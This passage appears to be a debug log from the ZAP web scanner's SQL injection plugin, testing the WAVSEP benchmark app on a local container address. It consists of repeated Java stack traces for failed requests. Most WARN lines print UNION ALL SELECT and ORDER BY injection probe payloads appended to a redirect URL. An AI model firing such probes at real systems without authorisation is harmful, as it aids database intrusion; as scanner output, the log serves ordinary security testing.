Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681551 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681552 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681553 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681554 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681554 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681555 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 9045#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 9045# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681556 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681557 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681558 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681559 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681560 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681560 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at 